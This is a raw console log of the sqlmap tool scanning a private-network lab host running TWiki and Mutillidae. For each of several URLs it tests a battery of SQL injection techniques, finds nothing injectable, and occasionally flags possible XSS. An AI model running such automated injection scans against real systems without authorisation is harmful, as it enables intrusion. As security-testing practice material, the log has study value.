GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:19:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:19:42] [INFO] testing connection to the target URL | |
[19:19:42] [INFO] testing if the target URL is stable | |
[19:19:43] [INFO] target URL is stable | |
[19:19:43] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:19:43] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:19:43] [INFO] URI parameter '#1*' is dynamic | |
[19:19:43] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:19:43] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:19:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:19:43] [WARNING] reflective value(s) found and filtering out | |
[19:19:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:19:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:19:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:19:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:19:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:19:47] [INFO] testing 'MySQL inline queries' | |
[19:19:47] [INFO] testing 'PostgreSQL inline queries' | |
[19:19:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:19:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:19:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:19:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:19:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:19:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:19:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:19:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:19:51] [INFO] testing 'Oracle AND time-based blind' | |
[19:19:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:19:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:19:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:20:02] [WARNING] URI parameter '#1*' is not injectable | |
[19:20:02] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 98: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:20:02] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?skin=print' | |
[19:20:02] [INFO] testing connection to the target URL | |
[19:20:03] [INFO] testing if the target URL is stable | |
[19:20:04] [INFO] target URL is stable | |
[19:20:04] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:20:04] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:20:04] [INFO] GET parameter 'skin' is dynamic | |
[19:20:04] [INFO] heuristics detected web page charset 'ascii' | |
[19:20:04] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:20:04] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:20:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:20:04] [WARNING] reflective value(s) found and filtering out | |
[19:20:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:20:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:20:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:20:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:20:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:20:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:20:12] [INFO] testing 'MySQL inline queries' | |
[19:20:12] [INFO] testing 'PostgreSQL inline queries' | |
[19:20:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:20:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:20:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:20:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:20:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:20:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:20:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:20:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:20:20] [INFO] testing 'Oracle AND time-based blind' | |
[19:20:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:20:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:20:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:20:48] [WARNING] GET parameter 'skin' is not injectable | |
[19:20:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 99: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.4&rev2=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:20:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.4&rev2=1.3' | |
[19:20:48] [INFO] testing connection to the target URL | |
[19:20:48] [INFO] testing if the target URL is stable | |
[19:20:49] [INFO] target URL is stable | |
[19:20:49] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:20:49] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:20:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:20:49] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:20:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:20:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:20:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:20:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:20:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:20:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:20:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:20:52] [INFO] testing 'MySQL inline queries' | |
[19:20:53] [INFO] testing 'PostgreSQL inline queries' | |
[19:20:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:20:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:20:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:20:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:20:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:20:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:20:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:20:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:20:56] [INFO] testing 'Oracle AND time-based blind' | |
[19:20:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:20:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:21:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:21:09] [WARNING] GET parameter 'rev1' is not injectable | |
[19:21:09] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:21:09] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:21:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:21:09] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:21:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:21:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:21:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:21:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:21:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:21:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:21:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:21:14] [INFO] testing 'MySQL inline queries' | |
[19:21:15] [INFO] testing 'PostgreSQL inline queries' | |
[19:21:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:21:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:21:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:21:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:21:19] [INFO] testing 'Oracle AND time-based blind' | |
[19:21:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:21:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:21:32] [WARNING] GET parameter 'rev2' is not injectable | |
[19:21:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 100: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:21:32] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.3' | |
[19:21:32] [INFO] testing connection to the target URL | |
[19:21:33] [INFO] testing if the target URL is stable | |
[19:21:34] [INFO] target URL is stable | |
[19:21:34] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:21:34] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:21:34] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:21:34] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:21:34] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:21:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:21:34] [WARNING] reflective value(s) found and filtering out | |
[19:21:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:21:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:21:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:21:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:21:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:21:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:21:39] [INFO] testing 'MySQL inline queries' | |
[19:21:39] [INFO] testing 'PostgreSQL inline queries' | |
[19:21:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:21:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:21:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:21:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:21:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:21:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:21:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:21:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:21:43] [INFO] testing 'Oracle AND time-based blind' | |
[19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:21:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:21:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:22:04] [WARNING] GET parameter 'rev' is not injectable | |
[19:22:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:22:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.3&rev2=1.2' | |
[19:22:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.2' | |
URL 101: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebChanges?template=oopsmore¶m1=1.4¶m2=1.4 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:22:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebChanges?template=oopsmore¶m1=1.4¶m2=1.4' | |
[19:22:04] [INFO] testing connection to the target URL | |
[19:22:04] [INFO] testing if the target URL is stable | |
[19:22:05] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:22:05] [INFO] testing if GET parameter 'template' is dynamic | |
[19:22:05] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:22:05] [INFO] GET parameter 'template' is dynamic | |
[19:22:05] [INFO] heuristics detected web page charset 'ascii' | |
[19:22:05] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:22:05] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:22:05] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:22:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:22:06] [WARNING] reflective value(s) found and filtering out | |
[19:22:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:22:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:22:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:22:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:22:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:22:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:22:08] [INFO] testing 'MySQL inline queries' | |
[19:22:09] [INFO] testing 'PostgreSQL inline queries' | |
[19:22:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:22:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:22:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:22:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:22:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:22:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:22:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:22:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:22:11] [INFO] testing 'Oracle AND time-based blind' | |
[19:22:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:22:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:22:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:22:21] [WARNING] GET parameter 'template' is not injectable | |
[19:22:21] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:22:21] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:22:22] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:22:22] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:22:22] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:22:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:22:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:22:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:22:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:22:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:22:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:22:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:22:26] [INFO] testing 'MySQL inline queries' | |
[19:22:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:22:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:22:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:22:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:22:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:22:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:22:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:22:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:22:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:22:30] [INFO] testing 'Oracle AND time-based blind' | |
[19:22:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:22:33] [INFO] target URL appears to be UNION injectable with 1 columns | |
[19:22:33] [WARNING] applying generic concatenation with double pipes ('||') | |
[19:22:33] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[19:22:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:22:47] [WARNING] GET parameter 'param1' is not injectable | |
[19:22:47] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:22:47] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:22:47] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:22:47] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:22:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:22:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:22:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:22:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:22:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:23:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:23:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:23:08] [INFO] testing 'MySQL inline queries' | |
[19:23:09] [INFO] testing 'PostgreSQL inline queries' | |
[19:23:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:23:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:23:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:23:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:23:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:23:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:23:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:23:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:23:35] [INFO] testing 'Oracle AND time-based blind' | |
[19:23:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:24:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:24:47] [WARNING] GET parameter 'param2' is not injectable | |
[19:24:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:24:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=redirectandlog.php' | |
[19:24:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=pen-test-tool-lookup.php' | |
URL 102: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiHistory?t=1441457128 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:24:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiHistory?t=1441457128' | |
[19:24:47] [INFO] testing connection to the target URL | |
[19:24:47] [INFO] testing if the target URL is stable | |
[19:24:48] [INFO] target URL is stable | |
[19:24:48] [INFO] testing if GET parameter 't' is dynamic | |
[19:24:48] [WARNING] GET parameter 't' does not appear dynamic | |
[19:24:48] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:24:48] [INFO] testing for SQL injection on GET parameter 't' | |
[19:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:24:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:24:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:24:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:24:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:24:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:24:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:24:53] [INFO] testing 'MySQL inline queries' | |
[19:24:53] [INFO] testing 'PostgreSQL inline queries' | |
[19:24:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:24:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:24:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:24:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:24:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:24:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:24:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:24:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:24:58] [INFO] testing 'Oracle AND time-based blind' | |
[19:24:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:24:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:25:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:25:14] [WARNING] GET parameter 't' is not injectable | |
[19:25:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 103: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *History[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:25:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *History[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:25:14] [INFO] testing connection to the target URL | |
[19:25:14] [INFO] testing if the target URL is stable | |
[19:25:15] [INFO] target URL is stable | |
[19:25:15] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:25:15] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:25:15] [INFO] URI parameter '#1*' is dynamic | |
[19:25:15] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:25:16] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:25:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:25:16] [WARNING] reflective value(s) found and filtering out | |
[19:25:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:25:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:25:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:25:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:25:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:25:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:25:20] [INFO] testing 'MySQL inline queries' | |
[19:25:20] [INFO] testing 'PostgreSQL inline queries' | |
[19:25:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:25:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:25:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:25:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:25:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:25:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:25:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:25:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:25:24] [INFO] testing 'Oracle AND time-based blind' | |
[19:25:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:25:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:25:36] [WARNING] URI parameter '#1*' is not injectable | |
[19:25:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 104: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:25:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?skin=print' | |
[19:25:36] [INFO] testing connection to the target URL | |
[19:25:36] [INFO] testing if the target URL is stable | |
[19:25:37] [INFO] target URL is stable | |
[19:25:37] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:25:37] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:25:37] [INFO] GET parameter 'skin' is dynamic | |
[19:25:38] [INFO] heuristics detected web page charset 'ascii' | |
[19:25:38] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:25:38] [INFO] testing for SQL injection on GET parameter 'skin' | |
